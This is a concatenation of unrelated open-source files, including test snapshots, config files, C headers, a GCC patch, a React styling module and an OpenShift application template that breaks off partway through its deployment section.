] [ ] [__] sb16 [X] [ ] [ ] [__] ne2000 [X] [ ] [ ] [__] i440FX pci [X] [ ] [ ] [__] debugger [X] [ ] [ ] [__] external loader [X] [ ] [ ] [__] VGA [X] [ ] [ ] [__] Thank you for your contribution in the Bochs testing effort! Please mail completed forms to [email protected].
{ "pile_set_name": "Github" }
--- created: '2020-02-26T19:54:24.690252Z' creator: sentry source: tests/sentry/grouping/test_variants.py --- app: hash: null component: app (exception of system takes precedence) exception (ignored because hash matches system variant) stacktrace frame (frame considered in-app because no frame is in-app) filename (ignored because filename is a URL) "/private/tmp/test.html" lineno (line number is not used if module or filename are available) 49 frame (frame considered in-app because no frame is in-app) filename (ignored because filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "testMethod" lineno (line number is not used if module or filename are available) 43 frame (frame considered in-app because no frame is in-app) filename (ignored because filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "aha" lineno (line number is not used if module or filename are available) 38 frame (frame considered in-app because no frame is in-app) filename (ignored because filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "eval" lineno (line number is not used if module or filename are available) 1 frame (frame considered in-app because no frame is in-app) filename (ignored because filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "test" lineno (line number is not used if module or filename are available) 32 frame (frame considered in-app because no frame is in-app) filename (ignored because filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "test/<" lineno (line number is not used if module or filename are available) 33 frame (frame considered in-app because no frame is in-app) filename (ignored because filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "callback" lineno (line number is not used if module or filename are available) 24 frame (frame considered in-app because no frame is in-app) filename (ignored because filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "callAnotherThing" lineno (line number is not used if module or filename are available) 19 frame (frame considered in-app because no frame is in-app) filename (ignored because filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "aha" lineno (line number is not used if module or filename are available) 18 type* "Error" value* "bad" -------------------------------------------------------------------------- system: hash: "be36642f41f047346396f018f62375d3" component: system* exception* stacktrace frame filename (ignored because filename is a URL) "/private/tmp/test.html" lineno (line number is not used if module or filename are available) 49 frame filename (ignored because filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "testMethod" lineno (line number is not used if module or filename are available) 43 frame filename (ignored because filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "aha" lineno (line number is not used if module or filename are available) 38 frame filename (ignored because filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "eval" lineno (line number is not used if module or filename are available) 1 frame filename (ignored because filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "test" lineno (line number is not used if module or filename are available) 32 frame filename (ignored because filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "test/<" lineno (line number is not used if module or filename are available) 33 frame filename (ignored because filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "callback" lineno (line number is not used if module or filename are available) 24 frame filename (ignored because filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "callAnotherThing" lineno (line number is not used if module or filename are available) 19 frame filename (ignored because filename is a URL) "/private/tmp/test.html" function (function name is not used if module or filename are available) "aha" lineno (line number is not used if module or filename are available) 18 type* "Error" value* "bad"
{ "pile_set_name": "Github" }
[general] ffmpeg_path: ffmpeg | avconv | none if using vlc vlc_path: /path/to/vlc videos: [ { 'title': "A New Hope", 'movie_path': "/path/to/movie-file", 'subtitle_path': "subs/Star_Wars_Episode_IV.srt", 'slug': 'hope', }, { 'title': "The Empire Strikes Back", 'movie_path': "/path/to/movie-file", 'subtitle_path': "subs/Star_Wars_Episode_V.srt", 'slug': 'empire', }, { 'title': "The Return of the Jedi", 'movie_path': "/path/to/movie-file", 'subtitle_path': "subs/Star_Wars_Episode_VI.srt", 'slug': 'return', }, { 'title': "The Force Awakes", 'movie_path': "/path/to/movie-file", 'subtitle_path': "subs/Star_Wars_Episode_VII.srt", 'slug': 'awakens', }, { 'title': "The Last Jedi", 'movie_path': "/path/to/movie-file", 'subtitle_path': "subs/Star_Wars_Episode_VIII.srt", 'slug': 'last', },] [imgur] client_id: imgur_client_id api_key: imgur_client_secret [twitter] app_key: twitter_app_key app_secret: twitter_app_secret oauth_token: twitter_oauth_token oauth_token_secret: twitter_oauth_token_secret [tumblr] consumer_key: tumblr_consumer_key consumer_secret: tumblr_consumer_secret oauth_token: tumblr_oauth_token oauth_token_secret: tumblr_oauth_token_secret
{ "pile_set_name": "Github" }
/* * SonarQube * Copyright (C) 2009-2020 SonarSource SA * mailto:info AT sonarsource DOT com * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 3 of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public License * along with this program; if not, write to the Free Software Foundation, * Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package org.sonarqube.ws.client.almsettings; import javax.annotation.Generated; /** * This is a POST request. * @see <a href="https://next.sonarqube.com/sonarqube/web_api/api/alm_settings/create_bitbucket">Further information about this action online (including a response example)</a> * @since 8.1 */ @Generated("sonar-ws-generator") public class CreateBitbucketRequest { private String key; private String url; private String personalAccessToken; /** * This is a mandatory parameter. */ public CreateBitbucketRequest setKey(String key) { this.key = key; return this; } public String getKey() { return key; } /** * This is a mandatory parameter. */ public CreateBitbucketRequest setPersonalAccessToken(String personalAccessToken) { this.personalAccessToken = personalAccessToken; return this; } public String getPersonalAccessToken() { return personalAccessToken; } /** * This is a mandatory parameter. */ public CreateBitbucketRequest setUrl(String url) { this.url = url; return this; } public String getUrl() { return url; } }
{ "pile_set_name": "Github" }
generatorName: groovy outputDir: samples/client/petstore/groovy inputSpec: modules/openapi-generator/src/test/resources/3_0/petstore.yaml templateDir: modules/openapi-generator/src/main/resources/Groovy additionalProperties: hideGenerationTimestamp: "true"
{ "pile_set_name": "Github" }
//////////////////////////////////////////////////////////////////// // Copyright (C) Alexander Telyatnikov, Ivan Keliukh, Yegor Anchishkin, SKIF Software, 1999-2013. Kiev, Ukraine // All rights reserved // This file was released under the GPLv2 on June 2015. //////////////////////////////////////////////////////////////////// #ifndef __Zw_to_Nt__NameConvert__H__ #define __Zw_to_Nt__NameConvert__H__ #ifdef NT_NATIVE_MODE #define ZwClose NtClose #define ZwOpenKey NtOpenKey #define ZwQueryValueKey NtQueryValueKey //#define ExAllocatePool(hernya,size) MyGlobalAlloc(size) //#define ExFreePool(addr) MyGlobalFree((PVOID)(addr)) #endif //NT_NATIVE_MODE #endif //__Zw_to_Nt__NameConvert__H__
{ "pile_set_name": "Github" }
commit 8570c4be394cff7282f332f97da2ff569a927ddb Author: Imre Kaloz <[email protected]> Date: Wed Feb 2 20:06:12 2011 +0000 fixup arm soft-float symbols SVN-Revision: 25325 --- a/libgcc/config/arm/t-linux +++ b/libgcc/config/arm/t-linux @@ -1,6 +1,10 @@ LIB1ASMSRC = arm/lib1funcs.S LIB1ASMFUNCS = _udivsi3 _divsi3 _umodsi3 _modsi3 _dvmd_lnx _clzsi2 _clzdi2 \ - _ctzsi2 _arm_addsubdf3 _arm_addsubsf3 + _ctzsi2 _arm_addsubdf3 _arm_addsubsf3 \ + _arm_negdf2 _arm_muldivdf3 _arm_cmpdf2 _arm_unorddf2 \ + _arm_fixdfsi _arm_fixunsdfsi _arm_truncdfsf2 \ + _arm_negsf2 _arm_muldivsf3 _arm_cmpsf2 _arm_unordsf2 \ + _arm_fixsfsi _arm_fixunssfsi # Just for these, we omit the frame pointer since it makes such a big # difference. --- a/gcc/config/arm/linux-elf.h +++ b/gcc/config/arm/linux-elf.h @@ -58,8 +58,6 @@ %{shared:-lc} \ %{!shared:%{profile:-lc_p}%{!profile:-lc}}" -#define LIBGCC_SPEC "%{mfloat-abi=soft*:-lfloat} -lgcc" - #define GLIBC_DYNAMIC_LINKER "/lib/ld-linux.so.2" #define LINUX_TARGET_LINK_SPEC "%{h*} \
{ "pile_set_name": "Github" }
//Generated at 2012-07-03 18:44:06 /* * Copyright (c) 2010 - 2011 Espressif System * */ #ifndef UART_REGISTER_H_INCLUDED #define UART_REGISTER_H_INCLUDED #define REG_UART_BASE( i ) (0x60000000+(i)*0xf00) //version value:32'h062000 #define UART_FIFO( i ) (REG_UART_BASE( i ) + 0x0) #define UART_RXFIFO_RD_BYTE 0x000000FF #define UART_RXFIFO_RD_BYTE_S 0 #define UART_INT_RAW( i ) (REG_UART_BASE( i ) + 0x4) #define UART_RXFIFO_TOUT_INT_RAW (BIT(8)) #define UART_BRK_DET_INT_RAW (BIT(7)) #define UART_CTS_CHG_INT_RAW (BIT(6)) #define UART_DSR_CHG_INT_RAW (BIT(5)) #define UART_RXFIFO_OVF_INT_RAW (BIT(4)) #define UART_FRM_ERR_INT_RAW (BIT(3)) #define UART_PARITY_ERR_INT_RAW (BIT(2)) #define UART_TXFIFO_EMPTY_INT_RAW (BIT(1)) #define UART_RXFIFO_FULL_INT_RAW (BIT(0)) #define UART_INT_ST( i ) (REG_UART_BASE( i ) + 0x8) #define UART_RXFIFO_TOUT_INT_ST (BIT(8)) #define UART_BRK_DET_INT_ST (BIT(7)) #define UART_CTS_CHG_INT_ST (BIT(6)) #define UART_DSR_CHG_INT_ST (BIT(5)) #define UART_RXFIFO_OVF_INT_ST (BIT(4)) #define UART_FRM_ERR_INT_ST (BIT(3)) #define UART_PARITY_ERR_INT_ST (BIT(2)) #define UART_TXFIFO_EMPTY_INT_ST (BIT(1)) #define UART_RXFIFO_FULL_INT_ST (BIT(0)) #define UART_INT_ENA( i ) (REG_UART_BASE( i ) + 0xC) #define UART_RXFIFO_TOUT_INT_ENA (BIT(8)) #define UART_BRK_DET_INT_ENA (BIT(7)) #define UART_CTS_CHG_INT_ENA (BIT(6)) #define UART_DSR_CHG_INT_ENA (BIT(5)) #define UART_RXFIFO_OVF_INT_ENA (BIT(4)) #define UART_FRM_ERR_INT_ENA (BIT(3)) #define UART_PARITY_ERR_INT_ENA (BIT(2)) #define UART_TXFIFO_EMPTY_INT_ENA (BIT(1)) #define UART_RXFIFO_FULL_INT_ENA (BIT(0)) #define UART_INT_CLR( i ) (REG_UART_BASE( i ) + 0x10) #define UART_RXFIFO_TOUT_INT_CLR (BIT(8)) #define UART_BRK_DET_INT_CLR (BIT(7)) #define UART_CTS_CHG_INT_CLR (BIT(6)) #define UART_DSR_CHG_INT_CLR (BIT(5)) #define UART_RXFIFO_OVF_INT_CLR (BIT(4)) #define UART_FRM_ERR_INT_CLR (BIT(3)) #define UART_PARITY_ERR_INT_CLR (BIT(2)) #define UART_TXFIFO_EMPTY_INT_CLR (BIT(1)) #define UART_RXFIFO_FULL_INT_CLR (BIT(0)) #define UART_CLKDIV( i ) (REG_UART_BASE( i ) + 0x14) #define UART_CLKDIV_CNT 0x000FFFFF #define UART_CLKDIV_S 0 #define UART_AUTOBAUD( i ) (REG_UART_BASE( i ) + 0x18) #define UART_GLITCH_FILT 0x000000FF #define UART_GLITCH_FILT_S 8 #define UART_AUTOBAUD_EN (BIT(0)) #define UART_STATUS( i ) (REG_UART_BASE( i ) + 0x1C) #define UART_TXD (BIT(31)) #define UART_RTSN (BIT(30)) #define UART_DTRN (BIT(29)) #define UART_TXFIFO_CNT 0x000000FF #define UART_TXFIFO_CNT_S 16 #define UART_RXD (BIT(15)) #define UART_CTSN (BIT(14)) #define UART_DSRN (BIT(13)) #define UART_RXFIFO_CNT 0x000000FF #define UART_RXFIFO_CNT_S 0 #define UART_CONF0( i ) (REG_UART_BASE( i ) + 0x20) #define UART_TXFIFO_RST (BIT(18)) #define UART_RXFIFO_RST (BIT(17)) #define UART_IRDA_EN (BIT(16)) #define UART_TX_FLOW_EN (BIT(15)) #define UART_LOOPBACK (BIT(14)) #define UART_IRDA_RX_INV (BIT(13)) #define UART_IRDA_TX_INV (BIT(12)) #define UART_IRDA_WCTL (BIT(11)) #define UART_IRDA_TX_EN (BIT(10)) #define UART_IRDA_DPLX (BIT(9)) #define UART_TXD_BRK (BIT(8)) #define UART_SW_DTR (BIT(7)) #define UART_SW_RTS (BIT(6)) #define UART_STOP_BIT_NUM 0x00000003 #define UART_STOP_BIT_NUM_S 4 #define UART_BIT_NUM 0x00000003 #define UART_BIT_NUM_S 2 #define UART_PARITY_EN (BIT(1)) #define UART_PARITY (BIT(0)) #define UART_CONF1( i ) (REG_UART_BASE( i ) + 0x24) #define UART_RX_TOUT_EN (BIT(31)) #define UART_RX_TOUT_THRHD 0x0000007F #define UART_RX_TOUT_THRHD_S 24 #define UART_RX_FLOW_EN (BIT(23)) #define UART_RX_FLOW_THRHD 0x0000007F #define UART_RX_FLOW_THRHD_S 16 #define UART_TXFIFO_EMPTY_THRHD 0x0000007F #define UART_TXFIFO_EMPTY_THRHD_S 8 #define UART_RXFIFO_FULL_THRHD 0x0000007F #define UART_RXFIFO_FULL_THRHD_S 0 #define UART_LOWPULSE( i ) (REG_UART_BASE( i ) + 0x28) #define UART_LOWPULSE_MIN_CNT 0x000FFFFF #define UART_LOWPULSE_MIN_CNT_S 0 #define UART_HIGHPULSE( i ) (REG_UART_BASE( i ) + 0x2C) #define UART_HIGHPULSE_MIN_CNT 0x000FFFFF #define UART_HIGHPULSE_MIN_CNT_S 0 #define UART_PULSE_NUM( i ) (REG_UART_BASE( i ) + 0x30) #define UART_PULSE_NUM_CNT 0x0003FF #define UART_PULSE_NUM_CNT_S 0 #define UART_DATE( i ) (REG_UART_BASE( i ) + 0x78) #define UART_ID( i ) (REG_UART_BASE( i ) + 0x7C) #endif // UART_REGISTER_H_INCLUDED
{ "pile_set_name": "Github" }
// @flow /* eslint no-eval: 0 */ // $FlowFixMe import styled, { css } from 'styled-components'; import { Gradient, Shadow, Transition, hexa } from '../globals'; const baseButton = css` display: flex; flex: none; align-self: center; align-items: center; justify-content: center; border-radius: 12px; font-weight: 700; white-space: nowrap; word-break: keep-all; transition: ${Transition.hover.off}; cursor: pointer; font-size: 14px; line-height: 1; position: relative; text-align: center; padding: ${props => (props.icon ? '4px 8px 4px 4px' : '12px 16px')}; &:hover { transition: ${Transition.hover.on}; box-shadow: ${props => props.disabled ? 'none' : `${Shadow.high} ${hexa(props.theme.bg.reverse, 0.15)}`}; opacity: ${props => (props.disabled ? '0.5' : '1')}; } /* if an icon and label are both present, add space around the label*/ div + span, span + span { margin: 0 8px; } `; export const Label = styled.span` display: block; flex: 1 0 auto; line-height: inherit; color: inherit; ${props => (props.loading && !props.hasIcon ? 'opacity: 0;' : 'opacity: 1;')}; align-self: center; margin: auto; `; export const StyledSolidButton = styled.button` ${baseButton} background-color: ${props => props.disabled ? props.theme.inactive : eval(`props.theme.${props.color ? props.color : `brand.alt`}`)}; background-image: ${props => props.disabled || props.gradientTheme === 'none' ? 'none' : props.gradientTheme ? Gradient( eval(`props.theme.${props.gradientTheme}.alt`), eval(`props.theme.${props.gradientTheme}.default`) ) : Gradient(props.theme.brand.alt, props.theme.brand.default)}; color: ${props => props.theme.text.reverse}; &:hover { background-color: ${props => props.disabled ? props.theme.inactive : eval( `props.theme.${props.hoverColor ? props.hoverColor : 'brand.alt'}` )}; } &:active { box-shadow: ${props => props.disabled ? 'none' : `${Shadow.low} ${hexa(props.theme.bg.reverse, 0.15)}`}; } `; export const StyledTextButton = styled(StyledSolidButton)` background: transparent; background-image: none; font-weight: 600; color: ${props => props.disabled ? props.theme.inactive : eval(`props.theme.${props.color ? props.color : 'text.alt'}`)}; transition: color 0.1s ease-out, box-shadow 0.2s ease-out 0.1s, border-radius 0.2s ease-out, padding: 0.2s ease-out; &:hover { background-color: transparent; box-shadow: none; color: ${props => props.disabled ? props.theme.inactive : eval( `props.theme.${props.hoverColor ? props.hoverColor : 'brand.alt'}` )}; transition: color 0.1s ease-in, box-shadow 0.2s ease-in 0.1s, padding 0.2s ease-in; } `; export const StyledOutlineButton = styled(StyledTextButton)` box-shadow: inset 0 0 0 2px ${props => props.disabled ? props.theme.inactive : eval(`props.theme.${props.color ? props.color : 'brand.default'}`)}; color: ${props => props.disabled ? props.theme.inactive : eval(`props.theme.${props.color ? props.color : 'brand.default'}`)}; transition: ${Transition.hover.on}; &:hover { background-color: ${({ theme }) => theme.bg.default}; color: ${props => props.disabled ? props.theme.inactive : eval( `props.theme.${props.hoverColor ? props.hoverColor : 'brand.alt'}` )}; box-shadow: inset 0 0 0 2px ${props => props.disabled ? props.theme.inactive : eval( `props.theme.${props.hoverColor ? props.hoverColor : 'brand.alt'}` )}; transition: ${Transition.hover.on}; } `; export const StyledIconButton = styled.button` ${baseButton} padding: 0; width: 32px; height: 32px; background-color: transparent; color: ${props => props.disabled ? props.theme.inactive : props.color ? eval(`props.theme.${props.color}`) : props.theme.text.alt}; opacity: ${props => (props.opacity ? props.opacity : 1)}; &:hover { color: ${props => props.disabled ? props.theme.inactive : props.hoverColor ? eval(`props.theme.${props.hoverColor}`) : props.color ? eval(`props.theme.${props.color}`) : props.theme.brand.alt}; transform: ${props => (props.disabled ? 'none' : 'scale(1.05)')}; box-shadow: none; opacity: 1; } `; export const SpinnerContainer = styled.div` width: 32px; height: 32px; position: relative; `;
{ "pile_set_name": "Github" }
{ "created_at": "2015-02-27T22:28:30.828992", "description": "Sphinx Themes for Flask related projects and Flask itself", "fork": true, "full_name": "lepture/flask-sphinx-themes", "language": "Python", "updated_at": "2015-02-27T22:28:30.829750" }
{ "pile_set_name": "Github" }
/* * NASA Docket No. GSC-18,370-1, and identified as "Operating System Abstraction Layer" * * Copyright (c) 2019 United States Government as represented by * the Administrator of the National Aeronautics and Space Administration. * All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ /* OSAL coverage stub replacement for shellLib.h */ #include <string.h> #include <stdlib.h> #include "utstubs.h" #include <OCS_shellLib.h> OCS_STATUS OCS_shellGenericInit( const char * config, int stackSize, const char * shellName, char **pShellName, OCS_BOOL interactive, OCS_BOOL loginAccess, int fdin, int fdout, int fderr) { return (UT_DEFAULT_IMPL(OCS_shellGenericInit)); }
{ "pile_set_name": "Github" }
{ "kind": "Template", "apiVersion": "v1", "metadata": { "annotations": { "iconClass": "icon-eap", "tags": "eap,javaee,java,jboss", "version": "1.4.8", "openshift.io/display-name": "JBoss EAP 6.4 + A-MQ (with https)", "openshift.io/provider-display-name": "Red Hat, Inc.", "description": "An example EAP 6 A-MQ application. For more information about using this template, see https://github.com/jboss-openshift/application-templates.", "template.openshift.io/long-description": "This template defines resources needed to develop Red Hat Enterprise Application Server 6.4 based application, including a build configuration, application deployment configuration, using Red Hat JBoss A-MQ with persistence and secure communication using https.", "template.openshift.io/documentation-url": "https://access.redhat.com/documentation/en/red-hat-jboss-enterprise-application-platform/", "template.openshift.io/support-url": "https://access.redhat.com" }, "name": "eap64-amq-persistent-s2i" }, "labels": { "template": "eap64-amq-persistent-s2i", "xpaas": "1.4.8" }, "message": "A new EAP 6 and A-MQ persistent based application with SSL support has been created in your project. The username/password for accessing the A-MQ service is ${MQ_USERNAME}/${MQ_PASSWORD}. Please be sure to create the following secrets: \"${HTTPS_SECRET}\" containing the ${HTTPS_KEYSTORE} file used for serving secure content; \"${JGROUPS_ENCRYPT_SECRET}\" containing the ${JGROUPS_ENCRYPT_KEYSTORE} file used for securing JGroups communications.", "parameters": [ { "displayName": "Application Name", "description": "The name for the application.", "name": "APPLICATION_NAME", "value": "eap-app", "required": true }, { "displayName": "Custom http Route Hostname", "description": "Custom hostname for http service route. Leave blank for default hostname, e.g.: <application-name>-<project>.<default-domain-suffix>", "name": "HOSTNAME_HTTP", "value": "", "required": false }, { "displayName": "Custom https Route Hostname", "description": "Custom hostname for https service route. Leave blank for default hostname, e.g.: secure-<application-name>-<project>.<default-domain-suffix>", "name": "HOSTNAME_HTTPS", "value": "", "required": false }, { "displayName": "Git Repository URL", "description": "Git source URI for application", "name": "SOURCE_REPOSITORY_URL", "value": "https://github.com/jboss-developer/jboss-eap-quickstarts.git", "required": true }, { "displayName": "Git Reference", "description": "Git branch/tag reference", "name": "SOURCE_REPOSITORY_REF", "value": "6.4.x", "required": false }, { "displayName": "Context Directory", "description": "Path within Git project to build; empty for root project directory.", "name": "CONTEXT_DIR", "value": "helloworld-mdb", "required": false }, { "displayName": "A-MQ Volume Size", "description": "Size of the volume used by A-MQ for persisting messages.", "name": "VOLUME_CAPACITY", "value": "1Gi", "required": true }, { "displayName": "JMS Connection Factory JNDI Name", "description": "JNDI name for connection factory used by applications to connect to the broker, e.g. java:/ConnectionFactory", "name": "MQ_JNDI", "value": "java:/ConnectionFactory", "required": false }, { "displayName": "Split Data?", "description": "Split the data directory for each node in a mesh.", "name": "AMQ_SPLIT", "value": "false", "required": false }, { "displayName": "A-MQ Protocols", "description": "Broker protocols to configure, separated by commas. Allowed values are: `openwire`, `amqp`, `stomp` and `mqtt`. Only `openwire` is supported by EAP.", "name": "MQ_PROTOCOL", "value": "openwire", "required": false }, { "displayName": "Queues", "description": "Queue names, separated by commas. These queues will be automatically created when the broker starts. Also, they will be made accessible as JNDI resources in EAP.", "name": "MQ_QUEUES", "value": "HELLOWORLDMDBQueue", "required": false }, { "displayName": "Topics", "description": "Topic names, separated by commas. These topics will be automatically created when the broker starts. Also, they will be made accessible as JNDI resources in EAP.", "name": "MQ_TOPICS", "value": "HELLOWORLDMDBTopic", "required": false }, { "displayName": "A-MQ Serializable Packages", "description": "List of packages that are allowed to be serialized for use in ObjectMessage, separated by commas. If your app doesn't use ObjectMessages, leave this blank. This is a security enforcement. For the rationale, see http://activemq.apache.org/objectmessage.html", "name": "MQ_SERIALIZABLE_PACKAGES", "value": "", "required": false }, { "displayName": "Server Keystore Secret Name", "description": "The name of the secret containing the keystore file", "name": "HTTPS_SECRET", "value": "eap-app-secret", "required": false }, { "displayName": "Server Keystore Filename", "description": "The name of the keystore file within the secret", "name": "HTTPS_KEYSTORE", "value": "keystore.jks", "required": false }, { "displayName": "Server Keystore Type", "description": "The type of the keystore file (JKS or JCEKS)", "name": "HTTPS_KEYSTORE_TYPE", "value": "", "required": false }, { "displayName": "Server Certificate Name", "description": "The name associated with the server certificate", "name": "HTTPS_NAME", "value": "", "required": false }, { "displayName": "Server Keystore Password", "description": "The password for the keystore and certificate", "name": "HTTPS_PASSWORD", "value": "", "required": false }, { "displayName": "A-MQ Username", "description": "User name for standard broker user. It is required for connecting to the broker. If left empty, it will be generated.", "name": "MQ_USERNAME", "from": "user[a-zA-Z0-9]{3}", "generate": "expression", "required": false }, { "displayName": "A-MQ Password", "description": "Password for standard broker user. It is required for connecting to the broker. If left empty, it will be generated.", "name": "MQ_PASSWORD", "from": "[a-zA-Z0-9]{8}", "generate": "expression", "required": false }, { "displayName": "A-MQ Mesh Discovery Type", "description": "The discovery agent type to use for discovering mesh endpoints. 'dns' will use OpenShift's DNS service to resolve endpoints. 'kube' will use Kubernetes REST API to resolve service endpoints. If using 'kube' the service account for the pod must have the 'view' role, which can be added via 'oc policy add-role-to-user view system:serviceaccount:<namespace>:default' where <namespace> is the project namespace.", "name": "AMQ_MESH_DISCOVERY_TYPE", "value": "dns", "required": false }, { "displayName": "A-MQ Storage Limit", "description": "The A-MQ storage usage limit", "name": "AMQ_STORAGE_USAGE_LIMIT", "value": "100 gb", "required": false }, { "displayName": "Github Webhook Secret", "description": "GitHub trigger secret", "name": "GITHUB_WEBHOOK_SECRET", "from": "[a-zA-Z0-9]{8}", "generate": "expression", "required": true }, { "displayName": "Generic Webhook Secret", "description": "Generic build trigger secret", "name": "GENERIC_WEBHOOK_SECRET", "from": "[a-zA-Z0-9]{8}", "generate": "expression", "required": true }, { "displayName": "ImageStream Namespace", "description": "Namespace in which the ImageStreams for Red Hat Middleware images are installed. These ImageStreams are normally installed in the openshift namespace. You should only need to modify this if you've installed the ImageStreams in a different namespace/project.", "name": "IMAGE_STREAM_NAMESPACE", "value": "openshift", "required": true }, { "displayName": "JGroups Secret Name", "description": "The name of the secret containing the keystore file", "name": "JGROUPS_ENCRYPT_SECRET", "value": "eap-app-secret", "required": false }, { "displayName": "JGroups Keystore Filename", "description": "The name of the keystore file within the secret", "name": "JGROUPS_ENCRYPT_KEYSTORE", "value": "jgroups.jceks", "required": false }, { "displayName": "JGroups Certificate Name", "description": "The name associated with the server certificate", "name": "JGROUPS_ENCRYPT_NAME", "value": "", "required": false }, { "displayName": "JGroups Keystore Password", "description": "The password for the keystore and certificate", "name": "JGROUPS_ENCRYPT_PASSWORD", "value": "", "required": false }, { "displayName": "JGroups Cluster Password", "description": "JGroups cluster password", "name": "JGROUPS_CLUSTER_PASSWORD", "from": "[a-zA-Z0-9]{8}", "generate": "expression", "required": true }, { "displayName": "Deploy Exploded Archives", "description": "Controls whether exploded deployment content should be automatically deployed", "name": "AUTO_DEPLOY_EXPLODED", "value": "false", "required": false }, { "displayName": "Maven mirror URL", "description": "Maven mirror to use for S2I builds", "name": "MAVEN_MIRROR_URL", "value": "", "required": false }, { "description": "List of directories from which archives will be copied into the deployment folder. If unspecified, all archives in /target will be copied.", "name": "ARTIFACT_DIR", "value": "", "required": false }, { "description": "Container memory limit", "name": "MEMORY_LIMIT", "value": "1Gi", "required": false } ], "objects": [ { "kind": "Service", "apiVersion": "v1", "spec": { "ports": [ { "port": 8080, "targetPort": 8080 } ], "selector": { "deploymentConfig": "${APPLICATION_NAME}" } }, "metadata": { "name": "${APPLICATION_NAME}", "labels": { "application": "${APPLICATION_NAME}" }, "annotations": { "description": "The web server's HTTP port.", "service.alpha.openshift.io/dependencies": "[{\"name\": \"${APPLICATION_NAME}-amq-tcp\", \"kind\": \"Service\"}]" } } }, { "kind": "Service", "apiVersion": "v1", "spec": { "ports": [ { "port": 8443, "targetPort": 8443 } ], "selector": { "deploymentConfig": "${APPLICATION_NAME}" } }, "metadata": { "name": "secure-${APPLICATION_NAME}", "labels": { "application": "${APPLICATION_NAME}" }, "annotations": { "description": "The web server's HTTPS port.", "service.alpha.openshift.io/dependencies": "[{\"name\": \"${APPLICATION_NAME}-amq-tcp\", \"kind\": \"Service\"}]" } } }, { "kind": "Service", "apiVersion": "v1", "spec": { "clusterIP": "None", "ports": [ { "name": "ping", "port": 8888 } ], "selector": { "deploymentConfig": "${APPLICATION_NAME}" } }, "metadata": { "name": "${APPLICATION_NAME}-ping", "labels": { "application": "${APPLICATION_NAME}" }, "annotations": { "service.alpha.kubernetes.io/tolerate-unready-endpoints": "true", "description": "The JGroups ping port for clustering." } } }, { "kind": "Service", "apiVersion": "v1", "spec": { "ports": [ { "port": 61616, "targetPort": 61616 } ], "selector": { "deploymentConfig": "${APPLICATION_NAME}-amq" } }, "metadata": { "name": "${APPLICATION_NAME}-amq-tcp", "labels": { "application": "${APPLICATION_NAME}" }, "annotations": { "description": "The broker's OpenWire port." } } }, { "kind": "Service", "apiVersion": "v1", "spec": { "clusterIP": "None", "ports": [ { "name": "mesh", "port": 61616 } ], "selector": { "deploymentConfig": "${APPLICATION_NAME}-amq" } }, "metadata": { "name": "${APPLICATION_NAME}-amq-mesh", "labels": { "application": "${APPLICATION_NAME}" }, "annotations": { "service.alpha.kubernetes.io/tolerate-unready-endpoints": "true", "description": "Supports node discovery for mesh formation." } } }, { "kind": "Route", "apiVersion": "v1", "id": "${APPLICATION_NAME}-http", "metadata": { "name": "${APPLICATION_NAME}", "labels": { "application": "${APPLICATION_NAME}" }, "annotations": { "description": "Route for application's HTTP service." } }, "spec": { "host": "${HOSTNAME_HTTP}", "to": { "name": "${APPLICATION_NAME}" } } }, { "kind": "Route", "apiVersion": "v1", "id": "${APPLICATION_NAME}-https", "metadata": { "name": "secure-${APPLICATION_NAME}", "labels": { "application": "${APPLICATION_NAME}" }, "annotations": { "description": "Route for application's HTTPS service." } }, "spec": { "host": "${HOSTNAME_HTTPS}", "to": { "name": "secure-${APPLICATION_NAME}" }, "tls": { "termination": "passthrough" } } }, { "kind": "ImageStream", "apiVersion": "v1", "metadata": { "name": "${APPLICATION_NAME}", "labels": { "application": "${APPLICATION_NAME}" } } }, { "kind": "BuildConfig", "apiVersion": "v1", "metadata": { "name": "${APPLICATION_NAME}", "labels": { "application": "${APPLICATION_NAME}" } }, "spec": { "source": { "type": "Git", "git": { "uri": "${SOURCE_REPOSITORY_URL}", "ref": "${SOURCE_REPOSITORY_REF}" }, "contextDir": "${CONTEXT_DIR}" }, "strategy": { "type": "Source", "sourceStrategy": { "env": [ { "name": "MAVEN_MIRROR_URL", "value": "${MAVEN_MIRROR_URL}" }, { "name": "ARTIFACT_DIR", "value": "${ARTIFACT_DIR}" } ], "forcePull": true, "from": { "kind": "ImageStreamTag", "namespace": "${IMAGE_STREAM_NAMESPACE}", "name": "jboss-eap64-openshift:1.7" } } }, "output": { "to": { "kind": "ImageStreamTag", "name": "${APPLICATION_NAME}:latest" } }, "triggers": [ { "type": "GitHub", "github": { "secret": "${GITHUB_WEBHOOK_SECRET}" } }, { "type": "Generic", "generic": { "secret": "${GENERIC_WEBHOOK_SECRET}" } }, { "type": "ImageChange", "imageChange": {} }, { "type": "ConfigChange" } ] } }, { "kind": "DeploymentConfig", "apiVersion": "v1", "metadata": { "name": "${APPLICATION_NAME}", "labels": { "application": "${APPLICATION_NAME}" } }, "spec": { 